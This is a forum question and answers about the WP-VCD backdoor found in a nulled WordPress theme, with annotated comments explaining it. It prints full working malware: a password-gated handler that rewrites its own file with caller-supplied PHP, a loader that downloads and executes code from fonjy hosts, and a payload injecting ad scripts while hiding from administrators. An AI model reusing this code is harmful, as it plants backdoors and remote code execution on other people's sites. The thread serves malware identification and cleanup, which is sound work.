JavaScript
Maxim Maxim, 2017-12-19 10:22:23

What can this code be responsible for?

In short, it is clear that this code is responsible for displaying pop-up windows when a visitor clicks anywhere on the site; the question is how it does this.
This code comes as standard with a nulled WordPress theme.

<?php
// Remote-control handler. It runs on any request that reaches this file with an
// `action` parameter and a `password` parameter equal to the hard-coded string
// below; no WordPress login or capability check is involved. The comparison is a
// loose `==` against a static value, so the string itself (and the "wp_vcd" name)
// can be used as a search indicator across theme and plugin files.
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '58d2df047ca5aefc4a688a14a0a49a67'))
  {
$div_code_name="wp_vcd";
    switch ($_REQUEST['action'])
      {

        




        // action=change_domain: rewrites this very file so that the download host
        // used by the loader further down becomes the request-supplied `newdomain`.
        case 'change_domain';
          if (isset($_REQUEST['newdomain']))
            {
              
              if (!empty($_REQUEST['newdomain']))
                {
                                                                           // Reads its own source; `@` hides any read error.
                                                                           if ($file = @file_get_contents(__FILE__))
                                                                        {
                                                                                                 // Captures the host part of the loader's download URL.
                                                                                                 if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                             {

                                                                                 // The captured text is used as a pattern without escaping and every
                                                                                 // case-insensitive match in the file is replaced by the raw request value.
                                                                                 $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                                                                                 // Overwrites this file in place; a write failure is silenced by `@`.
                                                                                 @file_put_contents(__FILE__, $file);
                                             print "true";
                                                                                                             }


                                                                        }
                }
            }
        break;

                // action=change_code: replaces whatever sits between the start/end marker
                // comments near the end of this file with the request-supplied `newcode`.
                // Because that region is inside the PHP section of the file, this stores
                // caller-chosen PHP in the file.
                case 'change_code';
          if (isset($_REQUEST['newcode']))
            {
              
              if (!empty($_REQUEST['newcode']))
                {
                                                                           if ($file = @file_get_contents(__FILE__))
                                                                        {
                                                                                                 // Captures the text between the two marker comments.
                                                                                                 if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                             {

                                                                                 // Only stripslashes() is applied to the request value before it is written.
                                                                                 $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                                                                                 @file_put_contents(__FILE__, $file);
                                             print "true";
                                                                                                             }


                                                                        }
                }
            }
        break;
        
        // Any other action value only prints this fixed error string.
        default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
      }
      
    // Ends the request here, so nothing else from the page is rendered.
    // NOTE(review): both actions depend on this file being writable by the PHP
    // process; read-only theme files and file-integrity monitoring would block or
    // reveal the rewrite.
    die("");
  }








// Loader stage: downloads PHP source from a remote host, executes it, and keeps a
// local copy so the code still runs when the download fails.
// Indicators visible in this block: outbound plain-HTTP requests from PHP to the
// three fonjy hosts, a wp-tmp.php file in wp-includes, in the active theme
// directory or in the working directory, and the names theme_temp_setup / wp_vcd.
$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
// Skipped entirely when theme_temp_setup() is already defined.
if(!function_exists('theme_temp_setup')) {
    // REQUEST_URI is written without quotes here, so PHP reads it as a constant
    // name. $path is not used anywhere in the visible code.
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    // Does nothing for requests whose URI contains wp-cron.php or xmlrpc.php.
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        
        // cURL-based download used as a fallback: returns the response body for
        // $url and follows redirects. No timeout is configured.
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        
        // Executes the PHP source passed in $phpCode: writes it, prefixed with an
        // opening PHP tag, to a temporary file in the system temp directory,
        // include()s that file, deletes it, and returns the variables that exist in
        // this function's scope afterwards.
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
            fwrite($handle, "<?php\n" . $phpCode);
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }
        

// Marker string. The only test applied to a download or a cached copy is that it
// contains this string (stripos). That is a substring check, not a signature:
// whoever controls the host, or the unencrypted HTTP path to it, decides what
// code is executed.
$wp_auth_key='e810cc8873fd72ff6d1585ebccddae8e';
        // Source 1: www.fonjy.cc, first with file_get_contents(), then with the cURL fallback.
        if (($tmpcontent = @file_get_contents("http://www.fonjy.cc/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.fonjy.cc/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                // Runs the downloaded code, then imports the variables it left
                // behind into the current scope.
                extract(theme_temp_setup($tmpcontent));
                // Caches the payload as wp-includes/wp-tmp.php; if that file does not
                // exist afterwards, tries the active theme directory, then the
                // current working directory. All write errors are silenced by `@`.
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
        
        
        elseif ($tmpcontent = @file_get_contents("http://www.fonjy.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {
            // Source 2: www.fonjy.pw (no cURL fallback here); same execute-and-cache
            // steps as for source 1.

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            // Both downloads failed: execute the cached copy from wp-includes.
            extract(theme_temp_setup($tmpcontent));
           
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            // Cached copy in the active theme directory.
            extract(theme_temp_setup($tmpcontent)); 

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            // Cached copy in the current working directory.
            extract(theme_temp_setup($tmpcontent)); 

        } elseif (($tmpcontent = @file_get_contents("http://www.fonjy.top/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.fonjy.top/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            // Source 3: www.fonjy.top, tried last; the code is executed but not cached.
            extract(theme_temp_setup($tmpcontent)); 

        }
        
        
        
        
        
    }
}

//$start_wp_theme_tmp



//wp_tmp


//$end_wp_theme_tmp
?>


3 answer(s)
Dmitry, 2019-10-09
@DcFanoiD

Shorter option

/**
 * Logs `counter` and re-schedules itself with a doubled delay until `counter`
 * exceeds `max`.
 *
 * @param {number} counter  value logged by this call
 * @param {number} max      last value that is still logged
 * @param {number} interval delay in milliseconds before the next call
 */
function tick(counter, max, interval) {
    if (counter > max) {
        return;
    }

    // The callback runs after the log below, so this call still prints the
    // un-incremented value.
    const scheduleNext = () => tick(++counter, max, interval * 2);
    setTimeout(scheduleNext, interval);

    console.log(counter);
}

// Start at 1 and stop after 30; the first delay is 1000 ms and doubles on every step.
tick(1, 30, 1000);

Orkhan Hasanli, 2017-12-20
@azerphoenix

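Install the Wordfence plugin and scan the site. It is possible that you installed an untrusted ("left") plugin that contained malicious code.
The wp-tmp.php file is not a WordPress core file and most likely needs to be removed. Deleting it alone is not enough, though: the loader shown in the question writes wp-tmp.php again whenever it manages to download the code, so the injected loader code itself has to be removed as well.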
Detailed information - link

As mentioned by ..., this is not a standard WordPress core file, and the code contains external links (already suspicious) which, moreover, are blacklisted.
Please make sure to follow our site cleaning guide in order to restore your site's integrity.

Maxim Maxim, 2017-12-19
@maksky

wp-tmp.php

// Payload stage (posted under the name wp-tmp.php). It injects third-party script
// tags into pages, but only for visitors that are not logged in, do not carry the
// marker cookie set below, are not on the recorded editor-IP list, and arrived
// from a search engine. Related artifacts named in this code: the file
// wp-includes/wp-feed.php and the cookies wordpress_cf_adm_use_adm and sevisitor.

// Turns off error display and error reporting for the request.
ini_set('display_errors', 0);
error_reporting(0);
// Same 32-character string the loader in the question looks for before it
// executes a download; $anx is not read anywhere else in the visible code.
$anx='e810cc8873fd72ff6d1585ebccddae8e';
if ( ! function_exists( 'slider_option' ) ) {  


// Filter for `the_content`: on single-post views, appends two script tags that
// load code from go.oclaserver.com and go.mobisla.com to the post content.
function slider_option($content){ 
if(is_single())
{




// $con is assigned but never used.
$con = '
';

$con2 = '

<script type="text/javascript" src="//go.oclaserver.com/apu.php?zoneid=1476266"></script>

<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1476269&interactive=1&pushup=1"></script>

';

$content=$content.$con2;
}
return $content;
} 

// `wp_footer` action: on every view that is not a single post, prints the same
// two script tags into the footer.
function slider_option_footer(){ 
if(!is_single())
{




$con2 = '

<script type="text/javascript" src="//go.oclaserver.com/apu.php?zoneid=1476266"></script>

<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1476269&interactive=1&pushup=1"></script>

';

echo $con2;
}
} 








// Sets the cookie wordpress_cf_adm_use_adm=1 with a lifetime of 1000 days
// (3600*24*1000 seconds).
function setting_my_first_cookie() {
  setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
  }


// Any logged-in user gets that cookie, registered on `init` with priority 1.
if(is_user_logged_in())
{
add_action( 'init', 'setting_my_first_cookie',1 );
}







// Users with the edit_others_pages capability have their IP address recorded in
// wp-includes/wp-feed.php, one address per line, unless it is already listed.
if( current_user_can('edit_others_pages'))
{

if (file_exists(ABSPATH.'wp-includes/wp-feed.php'))
{
// NOTE(review): this line was mangled by the hosting page's e-mail obfuscation;
// it presumably read the file into $ip with an `@`-silenced file_get_contents().
[email protected]_get_contents(ABSPATH.'wp-includes/wp-feed.php');
}

if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
{
$ip.=$_SERVER['REMOTE_ADDR'].'
';
@file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip);


}



}






// Search-engine detection: if the Referer header contains any of the listed
// substrings, sets the cookie sevisitor=1 for 120 seconds and flags the request.
// HTTP_REFERER is read without checking that it exists.
$ref = $_SERVER['HTTP_REFERER'];
$SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
foreach ($SE as $source) {
  if (strpos($ref,$source)!==false) {
    setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN); 
  $sevisitor=true;
  }
}






// Targeting gate. The two hooks are registered only when the visitor has no
// wordpress_cf_adm_use_adm cookie, is not logged in, is not on the IP list in
// wp-feed.php, and was flagged as search-engine traffic (now or via the cookie).
// For incident response this means the injected scripts are not served to a
// logged-in session or to a browser/IP that has been used to log in, so a check
// made only as an administrator will not show them.
if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in()) 
{
// NOTE(review): mangled by the hosting page like the line above; presumably an
// `@`-silenced file_get_contents() into $adtxt.
[email protected]_get_contents(ABSPATH.'wp-includes/wp-feed.php');
if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false)
{
if($sevisitor==true || isset($_COOKIE['sevisitor']))
{
add_filter('the_content','slider_option');
add_action('wp_footer','slider_option_footer');
}

}

} 
}
